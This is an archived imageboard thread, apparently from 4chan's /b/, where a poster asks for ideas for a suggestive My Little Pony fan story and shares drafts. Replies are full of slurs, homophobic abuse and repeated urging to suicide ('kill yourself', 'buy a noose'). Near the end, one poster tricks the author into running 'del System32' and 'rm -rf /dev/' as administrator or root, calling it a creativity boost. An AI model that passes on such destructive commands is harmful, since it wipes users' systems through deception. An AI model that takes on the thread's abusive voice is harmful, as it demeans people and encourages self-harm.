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>Pinkie Pie and Rainbow Dash are in a playful mood >They

The stories and information posted here are artistic works of fiction and falsehood.
Only a fool would take anything posted here as fact.

Thread replies: 244
Thread images: 152
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>Pinkie Pie and Rainbow Dash are in a playful mood
>They see this
What do they do?

(I'm writing a story and I need ideas.)
The fuck. Isn't there a board for this?
Get off /b/ and buy a noose.
Burn it alive and eat that delicious leagle meat
They turn 360 degrees and walk away.
Just saw this yesterday and besides, you fuckwits have your own board.
What I have so far:

>"Look Dashie! From one side of the fence, she's a Lion, and the other, she's a Griffin!"
>Gilda faces turns red as Pinkie hops back and forth over the fence.
>You'd never seen Gilda caught in such a ridiculous predicament despite the many years you've known her.
>You can't help but laugh.
"Dash! Quit laughing now. Help me now, or else."
"Or else what G?"
>You just keep laughing.
>"Lion! Griffin! Lion! Griffin! Lion!"
>Gilda is livid at this point.
>"That's it! Unstick me RIGHT now."
>You walk closer to Gilda.
>Dat ass though.
"Calm down G, we'll get you out of there."
>Gilda relaxes a little, you can see her muscles drop the tense they were holding.
>You place a hoof on Gilda's exposed ass.
>Pinkie giggles at the pun you didn't catch.
"I don't see why we can't have some fun first, right G?"
>Gilda's facial expression drops as you and Pinkie exchange devious smirks.
"So, Pinkie? Lion or Griffin?"
they kill themselves because the creator of the fanfic their forced to be in is a faggot
Abandoned thread, let it die.
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Aww, you guys are no fun...
they sat down
and played some sonic adventure they got from the old thrift shop. They remembered the game from their childhoods. But there was something wrong in the game. the disk was one side black and the other side had sonic but he was hiper realistic and had blood shot eyers. raindbow dash had thought he was smoking weed because that gets pinkie pis whet .they but the game in the ps1 . it started normal as usual . the sega logo and then sonic team but there was no sonic that ran past by the sonic team logo. the game continues normalz .BUT! . the first level did not have sonic it was knuckles but he was all black and had hyper realistic blood shot eyes. then he was dead. and the tv spelled K
Good, we don't want your faggot shit. Now get out before my fatass eats you.
I want to cum inside of rainbow dash
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>I want to cum inside of rainbow dash
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Ignore the hate, you're doing great anon! Show that catbutt who's boss!
my dick really stinks anons
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>Ignore the hate, you're doing great anon! Show that catbutt who's boss!
Hey hey, thanks! :D
Any suggestions for my story?
kill yourself
I remember this thread. Sorta like last night's but with a lot less Zootopia porn spam.
They don't do anything. But you make a fucking noose and off yourself
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Just an idea
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They take advantage of her already being stuck in the fence and restrain her down further by trying her it it with chains. Pinkie and Dash saw off a portion of said fence containing Gilda and cart her off to a cellar somewhere. Erotic Violence ensues in order of pinkie and dash to enact revenge on her for her booty behavior in season 2.
Kek erotic violence.
>360 degrees
Wouldnt you be walking towards them still?
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>They take advantage of her already being stuck in the fence and restrain her down further by trying her it it with chains. Pinkie and Dash saw off a portion of said fence containing Gilda and cart her off to a cellar somewhere. Erotic Violence ensues in order of pinkie and dash to enact revenge on her for her booty behavior in season 2.
I'm open to this idea! I want to do something more softcore, though. Something cutesy and playful.

1.) What kind of erotic violence do you want to read?

2.) What are some more softcore things they might do to her, instead?
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Pah it's four am bro, I'm too dabbed out/drunk to be staying up and reading green at the moment honestly . Sorry, if this ain't down when I wake up maybe I'll give some input. Just make sure its erotic and violent.
kill yourself
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>Pah it's four am bro, I'm too dabbed out/drunk to be staying up and reading green at the moment honestly . Sorry, if this ain't down when I wake up maybe I'll give some input. Just make sure its erotic and violent.
Thanks! Someone actually nice on 4chan, oh my god. And I'm not a bro. :P
hoof in the pooper
OP I have a suggestion for you.
1. Take this to /trash/ so you don't ridk getting b&, trust me it's not worth it and there are always mods.
2. Give us a name/place to watch out for the finished product.
Honestly, the only way you could go wrong is with futa, scat, or anal devastation, so go wherever you want with the story just make it erotic and lesbian.
anal with multiple vegetables. gourds, squash and shit
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>Take this to /trash/
Already tried that. I got zero replies.

>Give us a name/place to watch out for the finished product.

>go wherever you want with the story just make it erotic and lesbian.
But it's more fun with everyone adds all their ideas together!
>zero replies
/mlp/ maybe? You might be able to get under the radar if you post at the same time you did here. Heard there's been some clop threads that survive as of late, at least on mulp you're guaranteed ponyfags and no hate.
>everyone adds all their ideas
It's too late at night for me to coherently give good ideas for something like this, but I do agree. Also good excuse for writer's block.
Go back to /mlp/
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>It's too late at night for me to coherently give good ideas for something like this
Then email me, tomorrow!
[email protected]
Cringe thread?
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>Cringe thread?
Chilly out, pony sempai.
Y'all gonna post some porn or what?
You first fag
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Welcome aboard! Any ideas for the story I'm writing?
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Pic related
Actually, I'm the samefag that posted >>674708600. You can expect an email from a random address tomorrow though.
Kill yourself you brony faggot butt pirate virgin motherfucker.
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>You can expect an email from a random address tomorrow though.
Ok! I'm an open minded writer, so feel free to trow your ideas at me! I can show you my other work, too.
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Being a stereotype is way worse than being a pony fag
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>Burn in pony hell
bump for more RD.
You got your shit backwards again, anon.
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How about this:
>all the cloppers die
>mlp becomes the little girls show it was supposed to be
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>not posting best pony
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Stop interrupting my Luna thread derailment.
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>Stop interrupting my Luna thread derailment.
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i got a suggestion:
>some plot focused around character development with being loyal.


>party with the wonder bolts for RD promotion.
>get wasted.
>wake up.
>find missing wonder bolts.
>uncover last night activities.
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Any ideas for my story?
Nice meme
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Actually made me kek. I wouldn't read something like this normally but the "Lion or griffin part was quite humorous.
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>some plot focused around character development with being loyal
Like what? What did you have in mind?
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>Actually made me kek. I wouldn't read something like this normally but the "Lion or griffin part was quite humorous.
Thanks so much! I'm gonna write a complete story on the scenario. ant my email so I can keep you updated?

Have any suggestions for my story?
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Still >>674709881 this faggot.
Just trying to get some Luna up in this thread.
I really need to get some sleep but not till this thread 404's.
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Luna 1.png
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>Just trying to get some Luna up in this thread.
Allow me.
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well i kind of liked my second idea better but i would say:

>RD come into contact with person.
>become friends
>rest of main six see person as villain.
>RD defends villain.
>the 5 vs RD+villain.

I meant memes but please do post more hot Luna pic ~
Eh the storys not bad but some more help whould be on /mlp/ good luck on finding help here on /b/ between the newfags and autism if you do go on /mlp/ send link hear i wanna see it unfold
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>well i kind of liked my second idea better but i would say:
>RD come into contact with person.
>become friends
>rest of main six see person as villain.
>RD defends villain.
>the 5 vs RD+villain.
Right... but my story is about this: >>674703656
This is what I have so far: >>674704389
So I need ideas on how Pinkie Pie and Rainbow Dash can prank Gilda in her situation. Have any of those?
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real tips?!
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>Eh the storys not bad but some more help whould be on /mlp/ good luck on finding help here on /b/ between the newfags and autism if you do go on /mlp/ send link hear i wanna see it unfold
Want the truth? I get more help on /b/ than /mlp/ Too many snobs over there. Anons here are nicer. A thread on /mlp/ crashes almost as fast here; it's a quick-moving board.

>More Luna
Im guessing pinky whould do something with her front *probably a pie to face contest* while rd whould draw her butt to look like a face
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>Im guessing pinky whould do something with her front *probably a pie to face contest* while rd whould draw her butt to look like a face
Ooh, that's clever! What else could they draw on her butt?

By the way, who's your favorite character from the show?
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porn times
Ill try to help but i promise nothing i dont watch the show *much* but im guessing you going for a sexual thing and softcore will be hard to do *with 3 lesbians* now if you chould incorporate twilight in the she chould use magic or something but again your starting the story wrong for softcore you got a chick stuck about to be raped by to other chicks good luck on that being soft core
They chould put a big picture or something or if your wanting porn you chould make it were while pinkys doing the pie thing RD is behind a thing pinky set up to block her rear from veiw eating out gilda or fucking her
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>your starting the story wrong for softcore you got a chick stuck about to be raped by to other chicks good luck on that being soft core
But who says she will be raped? The goal is to make the story in a way that feeds both softcore and non-fetish readers, so everyone can enjoy it. Playful, yet suggestive/flirty pranks on Gilda is just the recipe!

>I'll try to help
Find me here: [email protected]
Drop me a line! I write free story requests, too.
If you got a kik account i chould message you thro that so it makes things easy to communicate
Two lost arts of the ancients. Very few still have these skills, none have yet to master it, and some have forgotten it completely...
damn ponies are hot, may be I should watch the show and go full autist.
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>Two lost arts of the ancients. Very few still have these skills, none have yet to master it, and some have forgotten it completely...
Hey you! Don't be bothering my help.
Well idk not really much you can do with a butt nonsexualy other than face or something
Oh rd chould just pull her tail when there doing the pie thing so she yells thus opening her mouth
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>If you got a kik account i chould message you thro that so it makes things easy to communicate
I rather not give that out here. Sorry!
Trust me i understand i made that mistake 1 with my facebook
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>Oh rd chould just pull her tail when there doing the pie thing so she yells thus opening her mouth
Pulling her tail! Ooh, I like this idea~

Have anymore?

And you should watch the show more often~
It's scarier there than /b/
How about a kick me sign?
And ya i try to but it is hard to do i cant find a site to watch them on a phone
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>How about a kick me sign?
Classic! And they could tie a little on her tail, too. How about a mirror on the ground behind her, so the sun's reflection roasts her rump?
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>And ya i try to but it is hard to do i cant find a site to watch them on a phone
Sounds good to me
Bc i dont got a computer atm mine overheated udk what season i was at i know it was near the 1 were they reinacted some thing were som ponys were fighting and it feed a dragon or some shit
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>som ponys were fighting and it feed a dragon or some shit
It whould be better if rd started pulling feathers sooner or l8er
>Bc i dont got a computer atm mine overheated udk what season i was at i know it was near the 1 were they reinacted some thing were som ponys were fighting and it feed a dragon or some shit
Indian detected.

i am Rahul

ur frm ??

do u hav kik ??

are u there ??

are u there ??

are u there ??
No it was like snowy and shit probably a Christmas episode
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Oh fuck you xD
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Dashie > Luna
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>It whould be better if rd started pulling feathers sooner or l8er
From Gilda's wings? Or did you mean her fur?
asl ??

u first
Probably fur idk i thought it was feathers on her ass
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Id like to say allahu ackbar to my jihads and jihadets out there
no fuckin the rabbit dam you
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>Probably fur idk i thought it was feathers on her ass
Yowza! Gilda get her thick, round bubble butt plucked would cause some funny reactions! Should Dashie only pluck a little? Or should she leave Gilda's butt girly ass totally bald?
NO! No fuckin you here!
Probably a lil then tease her a bit
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Gtfo newfag
alahi snakcbure
I swear to fuck i will kill you you smug rabbit whore
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>Probably a lil then tease her a bit

>Rainbow Dash places her hoof on Gilda's calf
>She slowly moves it up Gilda's thighs, just before stopping on her butt
>Gilda tightens up the muscles in her legs and butt
>Rainbow Dash playfully whistles
>She grips a little piece of Gilda's fur
Gilda: "Yeoooow!"
Ya thats good but dont forget the pie thing and pinkey
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>Ya thats good but dont forget the pie thing and pinkey
I will remember!

Anymore ideas for me? :>)
They should start learning karate from a talking rat that lives in the sewers and eat calzones. Maybe drum up a romantic love life with al "dig stroked" roker that also features vigilantism. Maybe they could talk like youth, say things like "neato". I don't like the idea of them being horses though. Change their animal.
Um id try to find a way at the end to set it up for a sequal or have it were gilda planned it
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>They should start learning karate from a talking rat that lives in the sewers and eat calzones. Maybe drum up a romantic love life with al "dig stroked" roker that also features vigilantism. Maybe they could talk like youth, say things like "neato". I don't like the idea of them being horses though. Change their animal.
Btw that wasnt me was some rndm
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They get into some wicked chems and die. Turns out that Hippogriff thing is actually a toxic waste trap. Fucking ponies.

Get off /b/
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>Um id try to find a way at the end to set it up for a sequal or have it were gilda planned it
Thanks for all the help! Do you like my story? What is your favorite part of the story?

Anything I can help you with?
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>Anything I can help you with?
run command prompt:
@echo off del system32

or if you UNIX/Linux:
rm -rf /dev/

It will make your story much better
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>Well idk yet its not done and just let me know when and were you post it ill email you
Sure thing! Do you like softcore? Is this a story that might interest you?

Any ideas I can help you with? Anything online you need help finding?
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of course, run as administrator or root.
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No thanks. I have a better motto.
you fucking pony faggot
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Thanks for bumping my thread!
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you're welcome
Yes and to the 2nd not really ty
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I actually find your posts funny. That's the irony.
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well, then laugh
glad i could make your life better
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Wrong board horsefucker, we only fuck real horses here.
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Lol, look at the mad little faggot
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well said
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I'm not reading this
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Oh, I do see where you're going, but I must insist:
>@echo off del C:\Windows\System32
>rm -rf /dev/

Just copy and paste the one you need in an Admin/Root command prompt/terminal, and you're good to go.

I really think it'll bring out your creativity. Give it a shot.

Also, this is a better motto. It even comes from a much better show.

So, you should keep trying those commands I gave you until one of them works.
BTW: Mac is UNIX, so that should work for you :-)
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goooood feels
fucking abominations
I love you
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well, you asked for it
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post all your shit, niggers 404 this thread asap , fuck rp-ing
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They tell you to fuck off to >>>/mlp
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ahh, moar fun for us all
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or off the face of the Earth for that matter
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Fluffy abuse and spiderman spam is A LOT more autistic than mlp
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needs moar cancer
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nothing is more autistic compared to roleplaying
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OP here. My thread was amazing! Thanks to everyone for playing.
Hey bro you get the email
you're welcome
fuck you
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Thread images: 152

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